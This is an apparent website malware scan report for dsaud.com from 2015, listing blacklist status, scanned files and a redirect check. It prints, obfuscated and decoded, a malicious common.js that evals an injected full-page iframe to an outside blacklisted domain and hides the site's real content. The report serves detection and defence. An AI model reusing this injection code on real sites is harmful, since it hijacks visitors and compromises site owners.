Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dsaud.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dsaud.com/ | HTTP/1.1 200 OK Date: Wed, 25 Feb 2015 01:46:19 GMT Accept-Ranges: bytes ETag: "a5942cc8404cd01:4430" Server: Microsoft-IIS/6.0 Content-Length: 19629 Content-Location: http://dsaud.com/index.html Content-Type: text/html Last-Modified: Thu, 19 Feb 2015 12:37:11 GMT X-Powered-By: ASP.NET | clean |
http://dsaud.com/index.html | 200 OK Content-Length: 19629 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.goldoj.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>´óÔ²ÒøÌ©·Ö¹«Ë¾|´óÔ²ÒøÌ©ÍøÕ¾-´óÔ²ÒøÌ©</title> <meta name="description" content="´óÔ²ÒøÌ©·Ö¹«Ë¾£¿ÎÒÃÇÌṩ¹ØÓÚ´óÔ²ÒøÌ©ÍøÕ¾µÄÐÅÏ¢ÒÔ¼°¹ØÓÚ´óÔ²ÒøÌ© ...[4386 bytes skipped]... | ||
http://www.dsaud.com/common.js | 200 OK Content-Length: 782 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.shdyyt.com var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="22'+'05" src="ht'+'tp://'+'ww'+'w.s'+'hdy'+'yt.c'+'om/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ document.body.children[i].style.display="non"+"e"; } }catch(e){} } },100); }catch(e){} Decoded script: document.write('<center id="showcloneshengxiaon"><iframe scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="2205" src="http://www.shdyyt.com/"></iframe></center>'); document.write('<center id="showcloneshengxiaon"><iframe scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="1400" height="2205" src="http://www.shdyyt.com/"></iframe></center>'); function () { try { document.getElementById("divAll").style.display = "none"; } catch (e) { } for (var i = 0; i < d ...[1233 bytes skipped]... | ||
http://www.dsaud.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://dsaud.com/test404page.js | HTTP/1.1 200 OK Date: Wed, 25 Feb 2015 01:46:26 GMT Accept-Ranges: bytes ETag: "e23d621417d7cf1:4430" Server: Microsoft-IIS/6.0 Content-Length: 1372 Content-Location: http://dsaud.com/404.html?404;http://dsaud.com:80/test404page.js Content-Type: text/html Last-Modified: Tue, 23 Sep 2014 10:13:54 GMT X-Powered-By: ASP.NET | clean |
http://dsaud.com/404.html?404;http://dsaud.com:80/test404page.js | 200 OK Content-Length: 1372 Content-Type: text/html | clean |
http://www.qq.com/404/search_children.js | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dsaud.com
Result:
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2015 01:46:19 GMT
Accept-Ranges: bytes
ETag: "a5942cc8404cd01:4430"
Server: Microsoft-IIS/6.0
Content-Length: 19629
Content-Location: http://dsaud.com/index.html
Content-Type: text/html
Last-Modified: Thu, 19 Feb 2015 12:37:11 GMT
X-Powered-By: ASP.NET
...19629 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dsaud.com
Referer: http://www.google.com/search?q=dsaud.com
Result:
The result is similar to the first query. There are no suspicious redirects found.